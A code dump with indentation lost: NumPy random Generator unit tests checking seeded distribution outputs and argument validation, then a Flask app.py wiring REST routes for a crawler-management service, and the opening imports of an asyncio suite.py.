def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
# Each config contains the initial seed, a number of raw steps
# the md5 hashes of the initial and the final states' keys and
# the position of of the initial and the final state.
# These were produced using the original C implementation.
seed = config["seed"]
steps = config["steps"]
mt19937 = MT19937(seed)
# Burn step
mt19937.random_raw(steps)
key = mt19937.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert mt19937.state["state"]["pos"] == config["initial"]["pos"]
assert md5.hexdigest() == config["initial"]["key_md5"]
jumped = mt19937.jumped()
key = jumped.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert jumped.state["state"]["pos"] == config["jumped"]["pos"]
assert md5.hexdigest() == config["jumped"]["key_md5"]
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [.3, .7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
|
app.py
|
import os
import sys
from multiprocessing import Process
from flask import Flask
from flask_cors import CORS
from flask_restful import Api
# from flask_restplus import Api
from routes.sites import SiteApi
from utils.log import other
from constants.node import NodeStatus
from db.manager import db_manager
from routes.schedules import ScheduleApi
from tasks.celery import celery_app
from tasks.scheduler import scheduler
file_dir = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.abspath(os.path.join(file_dir, '.'))
sys.path.append(root_path)
from config import FLASK_HOST, FLASK_PORT, PROJECT_LOGS_FOLDER
from routes.deploys import DeployApi
from routes.files import FileApi
from routes.nodes import NodeApi
from routes.spiders import SpiderApi, SpiderImportApi, SpiderManageApi
from routes.stats import StatsApi
from routes.tasks import TaskApi
# flask app instance
app = Flask(__name__)
app.config.from_object('config')
# init flask api instance
api = Api(app)
# cors support
CORS(app, supports_credentials=True)
# reference api routes
api.add_resource(NodeApi,
'/api/nodes',
'/api/nodes/<string:id>',
'/api/nodes/<string:id>/<string:action>')
api.add_resource(SpiderApi,
'/api/spiders',
'/api/spiders/<string:id>',
'/api/spiders/<string:id>/<string:action>')
api.add_resource(SpiderImportApi,
'/api/spiders/import/<string:platform>')
api.add_resource(SpiderManageApi,
'/api/spiders/manage/<string:action>')
api.add_resource(TaskApi,
'/api/tasks',
'/api/tasks/<string:id>',
'/api/tasks/<string:id>/<string:action>')
api.add_resource(DeployApi,
'/api/deploys',
'/api/deploys/<string:id>',
'/api/deploys/<string:id>/<string:action>')
api.add_resource(FileApi,
'/api/files',
'/api/files/<string:action>')
api.add_resource(StatsApi,
'/api/stats',
'/api/stats/<string:action>')
api.add_resource(ScheduleApi,
'/api/schedules',
'/api/schedules/<string:id>')
api.add_resource(SiteApi,
'/api/sites',
'/api/sites/<string:id>',
'/api/sites/get/<string:action>')
def monitor_nodes_status(celery_app):
def update_nodes_status(event):
node_id = event.get('hostname')
db_manager.update_one('nodes', id=node_id, values={
'status': NodeStatus.ONLINE
})
def update_nodes_status_online(event):
other.info(f"{event}")
with celery_app.connection() as connection:
recv = celery_app.events.Receiver(connection, handlers={
'worker-heartbeat': update_nodes_status,
# 'worker-online': update_nodes_status_online,
})
recv.capture(limit=None, timeout=None, wakeup=True)
# run scheduler as a separate process
scheduler.run()
# monitor node status
p_monitor = Process(target=monitor_nodes_status, args=(celery_app,))
p_monitor.start()
# create folder if it does not exist
if not os.path.exists(PROJECT_LOGS_FOLDER):
os.makedirs(PROJECT_LOGS_FOLDER)
if __name__ == '__main__':
# run app instance
app.run(host=FLASK_HOST, port=FLASK_PORT, threaded=True)
|
suite.py
|
import asyncio
import os
import re
import signal
import sys
import threading
import time
from asyncio import (
AbstractEventLoop,
CancelledError,
Future,
Task,
ensure_future,
get_event_loop,
